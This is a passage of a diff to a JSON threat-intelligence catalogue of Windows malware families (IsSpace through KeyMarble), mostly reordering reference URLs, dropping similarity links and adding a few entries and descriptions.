+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
"type": []
@@ -27664,11 +29287,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor",
- "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
"http://www.clearskysec.com/greenbug/",
"https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
- "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
+ "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
],
"synonyms": [],
"type": []
@@ -27695,8 +29318,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://twitter.com/malwrhunterteam/status/1085162243795369984"
+ "https://twitter.com/malwrhunterteam/status/1085162243795369984",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/"
],
"synonyms": [],
"type": []
@@ -27722,12 +29345,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace",
+ "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
"https://www.secureworks.com/research/threat-profiles/bronze-express",
"https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
"http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
- "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf",
"https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/"
],
"synonyms": [
@@ -27735,15 +29358,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "b9707a57-d15f-4937-b022-52cc17f6783f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a",
"value": "IsSpace"
},
@@ -27777,10 +29391,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff",
- "http://malware-traffic-analysis.net/2017/05/16/index.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://clairelevin.github.io/malware/2023/02/14/jaff.html",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
+ "http://malware-traffic-analysis.net/2017/05/16/index.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart"
],
"synonyms": [],
@@ -27806,10 +29421,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku",
+ "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146",
"https://securelist.com/whos-really-spreading-through-the-bright-star/68978/",
- "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf",
"https://www.brighttalk.com/webcast/7451/538775",
- "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146"
+ "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf"
],
"synonyms": [
"C3PRO-RACOON",
@@ -27827,8 +29442,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.janeleiro",
- "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
- "https://www.welivesecurity.com/2021/04/06/janeleiro-time-traveler-new-old-banking-trojan-brazil/"
+ "https://www.welivesecurity.com/2021/04/06/janeleiro-time-traveler-new-old-banking-trojan-brazil/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf"
],
"synonyms": [],
"type": []
@@ -27842,8 +29457,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jason",
"https://twitter.com/P3pperP0tts/status/1135503765287657472",
- "https://marcoramilli.com/2019/06/06/apt34-jason-project/",
"https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://marcoramilli.com/2019/06/06/apt34-jason-project/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
@@ -27900,10 +29515,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat",
- "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
"https://blog.talosintelligence.com/2020/01/jhonerat.html",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf"
+ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/"
],
"synonyms": [],
"type": []
@@ -27912,7 +29527,7 @@
"value": "JhoneRAT"
},
{
- "description": "",
+ "description": "According to PCrisk, Jigsaw is ransomware that uses the AES algorithm to encrypt various files stored on computers. Targeted files include .jpg, .docx, .mp3, .mp4, and many others.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw"
@@ -27936,20 +29551,33 @@
"uuid": "551b568f-68fa-4483-a10c-a6452ae6289e",
"value": "Jimmy"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8d3ed9af-c136-47a4-a0d2-50c8248435a4",
+ "value": "JLORAT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
- "https://www.us-cert.gov/ncas/alerts/TA18-149A",
- "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
- "https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
+ "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4"
+ "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
+ "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
+ "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
+ "https://www.us-cert.gov/ncas/alerts/TA18-149A",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
],
"synonyms": [],
"type": []
@@ -27967,15 +29595,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "673d05fa-4066-442c-bdb6-0c0a2da5ae62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6",
"value": "Joao"
},
@@ -28002,15 +29621,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4d4528ff-6260-4b5d-b2ea-6e11ca02c396",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631",
"value": "Jolob"
},
@@ -28038,15 +29648,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "05e2ccec-7050-47cf-b925-50907f57c639",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2",
"value": "JripBot"
},
@@ -28055,14 +29656,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox",
- "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/",
- "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://twitter.com/zlab_team/status/1208022180241530882",
- "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/",
- "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese",
"https://blogs.quickheal.com/multi-staged-jsoutprox-rat-targets-indian-cooperative-banks-and-finance-companies/",
- "https://www.seqrite.com/documents/en/white-papers/whitepaper-multi-staged-jsoutprox-rat-target-indian-co-operative-banks-and-finance-companies.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese",
+ "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/",
+ "https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/",
+ "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat",
+ "https://www.seqrite.com/documents/en/white-papers/whitepaper-multi-staged-jsoutprox-rat-target-indian-co-operative-banks-and-finance-companies.pdf"
],
"synonyms": [],
"type": []
@@ -28075,19 +29676,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader",
- "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded",
- "https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/jssloader-the-shellcode-edition",
- "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf",
- "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
- "https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/",
"https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf",
"https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://www.mandiant.com/resources/evolution-of-fin7",
"https://blog.morphisec.com/vmware-identity-manager-attack-backdoor",
- "https://www.secureworks.com/blog/excel-add-ins-deliver-jssloader-malware"
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://www.secureworks.com/blog/excel-add-ins-deliver-jssloader-malware",
+ "https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/jssloader-the-shellcode-edition",
+ "https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files",
+ "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [],
"type": []
@@ -28100,11 +29701,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato",
- "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf",
+ "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
"https://github.com/ohpe/juicy-potato",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
"https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/",
- "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/"
+ "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
],
"synonyms": [],
"type": []
@@ -28138,17 +29739,30 @@
"uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb",
"value": "KAgent"
},
+ {
+ "description": "A Telegram bot with browser stealing capabilities, written using the .NET framework.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kami",
+ "https://twitter.com/jaydinbas/status/1604918636422070289"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d78ade16-d038-44b6-adfa-2439dcaf4d87",
+ "value": "Kami"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany",
- "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
"https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf",
- "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
"https://www.secureworks.com/research/threat-profiles/iron-liberty",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector",
+ "https://vblocalhost.com/uploads/VB2021-Slowik.pdf"
],
"synonyms": [
"Karagny"
@@ -28177,9 +29791,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.karius",
+ "https://research.checkpoint.com/banking-trojans-development/",
"https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/",
- "https://research.checkpoint.com/banking-trojans-development/"
+ "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/"
],
"synonyms": [],
"type": []
@@ -28192,28 +29806,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff",
- "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
"https://www.secureworks.com/research/threat-profiles/cobalt-edgewater",
"https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/",
- "https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ",
"https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/",
+ "https://mp.weixin.qq.com/s/o_EVjBVN2sQ1q7cl4rUXoQ",
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
+ "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html",
"https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [
"CACTUSPIPE",
- "MailDropper"
+ "MailDropper",
+ "OILYFACE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a45c16d9-6945-428c-af46-0436903f9329",
"value": "Karkoff"
},
@@ -28222,14 +29829,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.karma",
- "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
- "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
"https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/",
+ "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
+ "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
"https://blogs.blackberry.com/en/2021/11/threat-thursday-karma-ransomware",
"https://www.youtube.com/watch?v=hgz5gZB3DxE",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://blog.cyble.com/2021/08/24/a-deep-dive-analysis-of-karma-ransomware/"
],
"synonyms": [],
"type": []
@@ -28242,8 +29849,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent",
- "https://www.threatconnect.com/blog/kasperagent-malware-campaign/",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/"
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
+ "https://www.threatconnect.com/blog/kasperagent-malware-campaign/"
],
"synonyms": [],
"type": []
@@ -28256,27 +29863,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar",
- "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://www.epicturla.com/blog/sysinturla",
"https://youtu.be/SW8kVkwDOrc?t=24706",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/",
+ "https://www.epicturla.com/blog/sysinturla",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
"https://securelist.com/sunburst-backdoor-kazuar/99981/",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a5399473-859b-4c64-999b-a3b4070cd513",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca",
"value": "Kazuar"
},
@@ -28311,8 +29910,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505"
],
"synonyms": [],
"type": []
@@ -28340,14 +29939,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos",
- "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
- "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/",
- "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
"https://en.wikipedia.org/wiki/Kelihos_botnet",
- "https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet",
"https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
- "https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/",
+ "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
+ "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/",
"https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/",
"https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/"
],
"synonyms": [],
@@ -28374,18 +29973,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown",
- "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
- "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7",
- "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf",
- "https://blog.cystack.net/word-based-malware-attack/",
"https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf",
"https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/",
+ "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam"
+ "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/",
+ "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
+ "https://blog.cystack.net/word-based-malware-attack/",
+ "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7"
],
"synonyms": [],
"type": []
@@ -28398,9 +29997,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican",
+ "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
"https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
- "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/",
"https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
],
"synonyms": [],
@@ -28427,13 +30026,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase",
- "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/",
- "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html",
- "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/",
- "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/",
"https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017",
- "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/",
- "https://voidsec.com/keybase-en/"
+ "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html",
+ "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/",
+ "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/",
+ "https://voidsec.com/keybase-en/",
+ "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/",
+ "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/"
],
"synonyms": [
"Kibex"
@@ -28448,26 +30047,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy",
+ "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html",
"https://www.secureworks.com/research/threat-profiles/bronze-hobart",
"https://citizenlab.ca/2016/11/parliament-keyboy/",
- "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
- "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
],
"synonyms": [
"TSSL"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "74167065-90b3-4c29-807a-79b6f098e45b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "28c13455-7f95-40a5-9568-1e8732503507",
"value": "KeyBoy"
},
@@ -28476,9 +30066,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3",
+ "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
"https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/",
- "https://twitter.com/smoothimpact/status/773631684038107136",
- "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
+ "https://twitter.com/smoothimpact/status/773631684038107136"
],
"synonyms": [],
"type": []
@@ -28491,23 +30081,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.us-cert.gov/ncas/analysis-reports/AR18-221A",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://research.checkpoint.com/north-korea-turns-against-russian-targets/"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
